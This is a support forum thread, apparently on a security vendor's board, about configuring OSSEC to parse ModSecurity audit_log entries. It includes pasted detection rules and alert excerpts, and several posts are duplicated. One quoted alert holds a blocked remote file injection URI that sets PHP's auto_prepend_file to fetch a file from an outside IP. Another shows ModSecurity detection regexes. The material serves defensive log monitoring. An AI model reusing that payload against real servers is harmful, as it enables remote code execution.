Ossec Log Format for audit_log?
Ossec Log Format for audit_log?
I've searched and searched but can't seem to find the correct log format to use for monitoring audit_log with Ossec.
<localfile>
<log_format>apache</log_format>
<location>/var/log/httpd/audit_log</location>
</localfile>
I've tried apache and syslog, but they only fire off Rule: 1002 and not the ModSecurity rules. What do I need for this to work?
<localfile>
<log_format>apache</log_format>
<location>/var/log/httpd/audit_log</location>
</localfile>
I've tried apache and syslog, but they only fire off Rule: 1002 and not the ModSecurity rules. What do I need for this to work?
-
- Atomicorp Staff - Site Admin
- Posts: 8355
- Joined: Wed Dec 31, 1969 8:00 pm
- Location: earth
- Contact:
Re: Ossec Log Format for audit_log?
Make sure you use the mod_security from the atomic or asl channel, it writes the logs in the correct format.
Re: Ossec Log Format for audit_log?
Thanks, I am.scott wrote:Make sure you use the mod_security from the atomic or asl channel, it writes the logs in the correct format.
Re: Ossec Log Format for audit_log?
Is "apache" the correct log format?
This is what I get reported in Ossec notifications:
OSSEC HIDS Notification.
2013 Sep 19 09:07:53
Received From: (server.hidden.com) 11.11.11.111->/var/log/httpd/audit_log
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):
[modsecurity] [client 173.54.19.213] [domain private.com] [403] [/20130919/20130919-0907/20130919-090751-UjsFN0E8MfIAAD2WOhQAAAAh] [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "508"] [id "340165"] [rev "279"] [msg "Atomicorp.com UNSUPPORTED DELAYED Rules: Uniencoded possible Remote File Injection attempt in URI (AE)"] [data "/index.php?-dsafe_mode=off -ddisable_functions=null -dallow_url_fopen=on -dallow_url_include=on -dauto_prepend_file=http://61.19.253.26/echo.txt"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Pattern match "=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?)://" at REQUEST_URI.
--END OF NOTIFICATION
OSSEC HIDS Notification.
2013 Sep 19 09:08:01
Received From: (server.hidden.com) 11.11.11.111->/var/log/httpd/audit_log
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):
[modsecurity] [client 117.26.202.193] [domain private.com] [403] [/20130919/20130919-0908/20130919-090800-UjsFQEE8MfIAAD2LMXQAAAAc] [file "/etc/httpd/modsecurity.d/20_asl_useragents.conf"] [line "265"] [id "309925"] [rev "4"] [msg "Atomicorp.com UNSUPPORTED DELAYED Rules: Suspicious User-Agent, parenthesis closed with a semicolon Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)"] Access denied with code 403 (phase 2). Match of "rx (Qualidator\\.com|ExaleadCloudView|^Mozilla/4\\.0 \\(compatible;\\)$|UTVDriveBot)" against "REQUEST_HEADERS:User-Agent" required.
--END OF NOTIFICATION
This is what I get reported in Ossec notifications:
OSSEC HIDS Notification.
2013 Sep 19 09:07:53
Received From: (server.hidden.com) 11.11.11.111->/var/log/httpd/audit_log
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):
[modsecurity] [client 173.54.19.213] [domain private.com] [403] [/20130919/20130919-0907/20130919-090751-UjsFN0E8MfIAAD2WOhQAAAAh] [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "508"] [id "340165"] [rev "279"] [msg "Atomicorp.com UNSUPPORTED DELAYED Rules: Uniencoded possible Remote File Injection attempt in URI (AE)"] [data "/index.php?-dsafe_mode=off -ddisable_functions=null -dallow_url_fopen=on -dallow_url_include=on -dauto_prepend_file=http://61.19.253.26/echo.txt"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Pattern match "=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?)://" at REQUEST_URI.
--END OF NOTIFICATION
OSSEC HIDS Notification.
2013 Sep 19 09:08:01
Received From: (server.hidden.com) 11.11.11.111->/var/log/httpd/audit_log
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):
[modsecurity] [client 117.26.202.193] [domain private.com] [403] [/20130919/20130919-0908/20130919-090800-UjsFQEE8MfIAAD2LMXQAAAAc] [file "/etc/httpd/modsecurity.d/20_asl_useragents.conf"] [line "265"] [id "309925"] [rev "4"] [msg "Atomicorp.com UNSUPPORTED DELAYED Rules: Suspicious User-Agent, parenthesis closed with a semicolon Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)"] Access denied with code 403 (phase 2). Match of "rx (Qualidator\\.com|ExaleadCloudView|^Mozilla/4\\.0 \\(compatible;\\)$|UTVDriveBot)" against "REQUEST_HEADERS:User-Agent" required.
--END OF NOTIFICATION
- mikeshinn
- Atomicorp Staff - Site Admin
- Posts: 4149
- Joined: Thu Feb 07, 2008 7:49 pm
- Location: Chantilly, VA
Re: Ossec Log Format for audit_log?
Yes, "apache" is correct. This error:
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Means your ossec rules dont have rules to parse or understand the modsecurity log events, so you'll also have to create ossec rules to detect and parse them (pull out IP addresses, etc.).
Or you can use ASL. ASL includes our custom ossec rules for each of our modsecurity rules, giving you both fine grained control over how each modsecurity rule is treated by ossec, and the ability for ossec to do deep event, attack type and vulnerability type correlation of the modsecurity events with other events on the system.
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Means your ossec rules dont have rules to parse or understand the modsecurity log events, so you'll also have to create ossec rules to detect and parse them (pull out IP addresses, etc.).
Or you can use ASL. ASL includes our custom ossec rules for each of our modsecurity rules, giving you both fine grained control over how each modsecurity rule is treated by ossec, and the ability for ossec to do deep event, attack type and vulnerability type correlation of the modsecurity events with other events on the system.
Michael Shinn
Atomicorp - Security For Everyone
Atomicorp - Security For Everyone
Re: Ossec Log Format for audit_log?
Here are the mod_security rules included in my apache_rules.xml:
<!-- Mod security rules by <ossec ( at ) sioban.net -->
<rule id="30118" level="6">
<if_sid>30101</if_sid>
<match>mod_security: Access denied|ModSecurity: Access denied</match>
<description>Access attempt blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>
<rule id="30119" level="12" frequency="6" timeframe="120">
<if_matched_sid>30118</if_matched_sid>
<same_source_ip />
<description>Multiple attempts blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>
<rule id="30120" level="12">
<if_sid>30101</if_sid>
<match>Resource temporarily unavailable:</match>
<description>Apache without resources to run.</description>
<group>service_availability,</group>
</rule>
<rule id="30200" level="6" noalert="1">
<match>^mod_security-message: </match>
<description>Modsecurity alert.</description>
</rule>
<rule id="30201" level="6">
<if_sid>30200</if_sid>
<match>^mod_security-message: Access denied </match>
<description>Modsecurity access denied.</description>
<group>access_denied,</group>
</rule>
<rule id="30202" level="10" frequency="8" timeframe="120">
<if_matched_sid>30201</if_matched_sid>
<description>Multiple attempts blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>
<!-- Mod security rules by <ossec ( at ) sioban.net -->
<rule id="30118" level="6">
<if_sid>30101</if_sid>
<match>mod_security: Access denied|ModSecurity: Access denied</match>
<description>Access attempt blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>
<rule id="30119" level="12" frequency="6" timeframe="120">
<if_matched_sid>30118</if_matched_sid>
<same_source_ip />
<description>Multiple attempts blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>
<rule id="30120" level="12">
<if_sid>30101</if_sid>
<match>Resource temporarily unavailable:</match>
<description>Apache without resources to run.</description>
<group>service_availability,</group>
</rule>
<rule id="30200" level="6" noalert="1">
<match>^mod_security-message: </match>
<description>Modsecurity alert.</description>
</rule>
<rule id="30201" level="6">
<if_sid>30200</if_sid>
<match>^mod_security-message: Access denied </match>
<description>Modsecurity access denied.</description>
<group>access_denied,</group>
</rule>
<rule id="30202" level="10" frequency="8" timeframe="120">
<if_matched_sid>30201</if_matched_sid>
<description>Multiple attempts blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>
Re: Ossec Log Format for audit_log?
After reviewing the rules I just posted, the match phrases seem to be incorrect for the way audit_log has things worded.
Do I have the wrong Ossec rules or the wrong audit_log format?
Do I have the wrong Ossec rules or the wrong audit_log format?
- mikeshinn
- Atomicorp Staff - Site Admin
- Posts: 4149
- Joined: Thu Feb 07, 2008 7:49 pm
- Location: Chantilly, VA
Re: Ossec Log Format for audit_log?
Wrong or old ossec rules.
Michael Shinn
Atomicorp - Security For Everyone
Atomicorp - Security For Everyone
Re: Ossec Log Format for audit_log?
I have the latest Ossec 2.7 with rules installed from ossec.net. They do list getting it directly from the AtomiCorp repository, however my monitoring server is an AWS and not compatible with "RPMs for RHEL, CentOS, Fedora and others". I used Server 2.7 – Linux/BSD download instead.
http://www.ossec.net/?page_id=19
Would that make a difference?
http://www.ossec.net/?page_id=19
Would that make a difference?
- mikeshinn
- Atomicorp Staff - Site Admin
- Posts: 4149
- Joined: Thu Feb 07, 2008 7:49 pm
- Location: Chantilly, VA
Re: Ossec Log Format for audit_log?
It certainly could. The other problem you're going to have with the ossec rules you posted is that they dont recognized modsecurity levels, and will treat all modsecurity events the same. Which means you'll also end up blocking lower level rules (suspicious or just informational rules, as opposed to actual attacks).
Michael Shinn
Atomicorp - Security For Everyone
Atomicorp - Security For Everyone